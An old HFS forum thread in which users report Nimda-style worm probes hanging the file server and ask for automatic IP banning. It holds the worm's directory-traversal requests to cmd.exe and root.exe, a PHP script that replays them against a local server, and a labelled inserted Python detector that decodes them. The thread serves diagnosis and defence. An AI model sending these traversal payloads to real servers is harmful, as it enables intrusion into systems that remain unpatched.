rejetto forum

Software => HFS ~ HTTP File Server => Topic started by: Anonymous on September 21, 2004, 10:37:25 AM

Title: Automatically ban worms?
Post by: Anonymous on September 21, 2004, 10:37:25 AM
Would be very nice if you could automatically ban IP addresses that send GET requests containing certain keywords.

Kind of like this:
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
GET /scripts/..Á../winnt/system32/cmd.exe?/c dir
GET /scripts/..À/../winnt/system32/cmd.exe?/c dir
GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir
GET /scripts/..Áœ../winnt/system32/cmd.exe?/c dir

etc...
Title: Automatically ban worms?
Post by: Anonymous on September 21, 2004, 12:38:30 PM
Second time this has happened today, but it seems that when I get these worm GET attempts, HFS hangs.

The menu button stops working completely, for instance :(
Title: Automatically ban worms?
Post by: Anonymous on September 22, 2004, 08:51:42 AM
Quote from: "Anonymous"
Second time this has happened today, but it seems that when I get these worm GET attempts, HFS hangs.

The menu button stops working completely, for instance :(

Rejetto, this seems consistent for me, because HFS has hung all three times I've gotten these malformed GET requests.
Title: Automatically ban worms?
Post by: rejetto on September 22, 2004, 03:14:16 PM
I need a way to reproduce the problem.
Can you help me find such a tool?
Or also the exact HTTP request?
Title: Automatically ban worms?
Post by: Anonymous on September 22, 2004, 06:52:56 PM
Quote from: "rejetto"
I need a way to reproduce the problem.
Can you help me find such a tool?
Or also the exact HTTP request?

Here's a log file:

On 3 occasions the same IP caused HFS to hang. When trying to click the Menu button, nothing would happen.

I added the IP as banned when it happened the first time, so I only saw ".... connected" after that, but still the server hung.

Code: [Select]
2004-09-21 11:17:41 213.114.30.46:2299 Connected
2004-09-21 11:17:41 213.114.30.46:2299 Requested GET /scripts/root.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2299 Request dump
> GET /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2301 Connected
2004-09-21 11:17:41 213.114.30.46:2301 Requested GET /MSADC/root.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2301 Request dump
> GET /MSADC/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2313 Connected
2004-09-21 11:17:41 213.114.30.46:2313 Requested GET /c/winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2313 Request dump
> GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2315 Connected
2004-09-21 11:17:41 213.114.30.46:2315 Requested GET /d/winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2315 Request dump
> GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2320 Connected
2004-09-21 11:17:41 213.114.30.46:2320 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:41 213.114.30.46:2320 Request dump
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2326 Connected
2004-09-21 11:17:42 213.114.30.46:2326 Requested GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2326 Request dump
> GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2328 Connected
2004-09-21 11:17:42 213.114.30.46:2328 Requested GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2328 Request dump
> GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2331 Connected
2004-09-21 11:17:42 213.114.30.46:2331 Requested GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2331 Request dump
> GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2335 Connected
2004-09-21 11:17:42 213.114.30.46:2335 Requested GET /scripts/..Á../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2335 Request dump
> GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2339 Connected
2004-09-21 11:17:42 213.114.30.46:2339 Requested GET /scripts/..À/../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2339 Request dump
> GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2340 Connected
2004-09-21 11:17:42 213.114.30.46:2340 Requested GET /scripts/..À¯../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2340 Request dump
> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:42 213.114.30.46:2343 Connected
2004-09-21 11:17:42 213.114.30.46:2343 Requested GET /scripts/..Áœ../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:42 213.114.30.46:2343 Request dump
> GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2344 Connected
2004-09-21 11:17:43 213.114.30.46:2344 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2344 Request dump
> GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2346 Connected
2004-09-21 11:17:43 213.114.30.46:2346 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2346 Request dump
> GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2353 Connected
2004-09-21 11:17:43 213.114.30.46:2353 Requested GET /scripts/..%5c../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2353 Request dump
> GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:43 213.114.30.46:2360 Connected
2004-09-21 11:17:43 213.114.30.46:2360 Requested GET /scripts/..%2f../winnt/system32/cmd.exe?/c dir
2004-09-21 11:17:43 213.114.30.46:2360 Request dump
> GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
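Added example (not HFS code and not taken from any post in this thread): the automatic ban asked for in the first post, run over log text in the format of the request dump above. The sixteen requests in that dump, from /scripts/root.exe through /scripts/..%252f.., sent with the misspelled "Connnection: close" header, are the scan sequence of the Nimda worm, so a single match is reason enough to ban the source. The script peels nested percent-encoding (%255c, %%35%63, %25%35%63) and folds overlong UTF-8 (%c0%af, %c1%9c, %c1%1c) the way the IIS decoder of the time did, and only then looks for cmd.exe, root.exe or a /../ traversal, so re-encoded variants of the same payload are still caught. Assumptions: the log-line layout is taken from the dump as posted; the keyword list, the threshold, and the benign 192.0.2.10 client in the sample log are constructed for illustration.

```python
"""Flag and ban IPs whose raw requests look like IIS worm probes, from HFS-style log text."""
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# HFS writes "<date> <time> <ip>:<port> Request dump" followed by "> " raw request lines.
DUMP_HEADER = re.compile(r"^\S+ \S+ (?P<ip>\d{1,3}(?:\.\d{1,3}){3}):\d+ Request dump$")
REQUEST_LINE = re.compile(r"^> (?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d$")

# Strings with no business in a request to a file server (assumed list, extend to taste).
WORM_KEYWORDS = ("cmd.exe", "root.exe")
TRAVERSAL = "/../"


def _fold_overlong(data: bytes) -> bytes:
    """Collapse 2-byte overlong UTF-8 (lead byte 0xC0/0xC1) into the ASCII byte it
    encodes, leniently accepting any second byte. That is what the 2001-era IIS
    decoder did, which is why %c0%af and %c1%9c reached the file system as / and \\."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return bytes(out)


def normalize_path(raw: str, max_rounds: int = 4) -> str:
    """Peel nested percent-encoding (%255c, %%35%63, %25%35%63) and overlong UTF-8
    until the path stops changing, then canonicalise separators and case."""
    data = raw.encode("latin-1", "replace")
    for _ in range(max_rounds):
        nxt = _fold_overlong(unquote_to_bytes(data))
        if nxt == data:
            break
        data = nxt
    return data.decode("latin-1").replace("\\", "/").lower()


def classify(raw_path: str) -> list[str]:
    """Return the reasons a request path looks like a worm probe (empty if clean)."""
    path = normalize_path(raw_path)
    reasons = [kw for kw in WORM_KEYWORDS if kw in path]
    if TRAVERSAL in path:
        reasons.append("traversal")
    return reasons


def scan_log(log_text: str) -> dict[str, list[str]]:
    """Walk HFS log text; map each offending IP to the raw paths that matched."""
    hits: dict[str, list[str]] = defaultdict(list)
    current_ip = None
    for line in log_text.splitlines():
        if m := DUMP_HEADER.match(line):
            current_ip = m["ip"]          # attribute following "> " lines to this client
        elif (m := REQUEST_LINE.match(line)) and current_ip:
            if classify(m["path"]):
                hits[current_ip].append(m["path"])
    return dict(hits)


def ban_list(log_text: str, threshold: int = 1) -> set[str]:
    """IPs to ban: any with at least `threshold` matching requests. One hit is
    enough here because no legitimate HFS client asks for cmd.exe."""
    return {ip for ip, paths in scan_log(log_text).items() if len(paths) >= threshold}


# Constructed sample in the shape of the log posted in the thread: three of the
# worm's requests (the "Connnection" typo is the worm's own) plus a benign client
# on an RFC 5737 documentation address.
SAMPLE_LOG = """\
2004-09-21 11:17:41 213.114.30.46:2299 Connected
2004-09-21 11:17:41 213.114.30.46:2299 Request dump
> GET /scripts/root.exe?/c+dir HTTP/1.0
> Host: www
> Connnection: close
2004-09-21 11:17:41 213.114.30.46:2320 Request dump
> GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
2004-09-21 11:17:42 213.114.30.46:2340 Request dump
> GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Host: www
2004-09-21 11:20:03 192.0.2.10:4411 Request dump
> GET /pub/My%20Files/report.pdf HTTP/1.1
> Host: www
"""

if __name__ == "__main__":
    for ip, paths in scan_log(SAMPLE_LOG).items():
        print(ip, len(paths), "worm requests")
    print("ban:", sorted(ban_list(SAMPLE_LOG)))
```

Point it at the HFS log file and push the returned set into the ban list. Matching after normalisation is what matters: a plain keyword filter on the raw line would miss /scripts/..%%35%63../ and friends, while the normalised form of every one of the sixteen requests contains either cmd.exe, root.exe or /../.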
Title: Automatically ban worms?
Post by: Anonymous on September 22, 2004, 06:53:59 PM
Quote from: "rejetto"
i need a way to reproduce the problem
can you help me finding such a tool?
or also the exact http request

The tool is probably a worm like "Code Red" or something. I don't have that :)
Title: Automatically ban worms?
Post by: rejetto on September 23, 2004, 01:45:48 AM
I made this PHP script to test, but it was not able to hang my HFS :(
Code: [Select]
<?php
// Replays the 16 request paths from the posted log against a local HFS to try
// to reproduce the hang. Change $host/$port if HFS is not on localhost:80.
$host = 'localhost';
$port = 80;
$urls = array(
'/scripts/root.exe?/c+dir',
'/MSADC/root.exe?/c+dir',
'/c/winnt/system32/cmd.exe?/c+dir',
'/d/winnt/system32/cmd.exe?/c+dir',
'/scripts/..%255c../winnt/system32/cmd.exe?/c+dir',
'/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir',
'/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir',
'/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir',
'/scripts/..%252f../winnt/system32/cmd.exe?/c+dir',
);

foreach ($urls as $url) {
  $sock = @fsockopen($host, $port, $errno, $errstr, 5);
  if (!$sock) die("cant open: $errstr ($errno)\n");
  stream_set_timeout($sock, 5); // give up on a socket HFS never answers
  fwrite($sock, "GET $url HTTP/1.0\r\nHost: www\r\nConnection: close\r\n\r\n");
  // drain the response; stop on a timed-out read instead of spinning forever
  while (!feof($sock)) {
    $chunk = fread($sock, 4096);
    if ($chunk === false || $chunk === '') break;
  }
  fclose($sock);
  echo '.';
}
echo "\n";
?>
Title: Automatically ban worms?
Post by: Anonymous on September 26, 2004, 09:10:54 PM
I'll report back with a full log if it happens again. (haven't run the server in a while now).

I had "let browse" on the root turned off when this happened (if that would be any kind of help).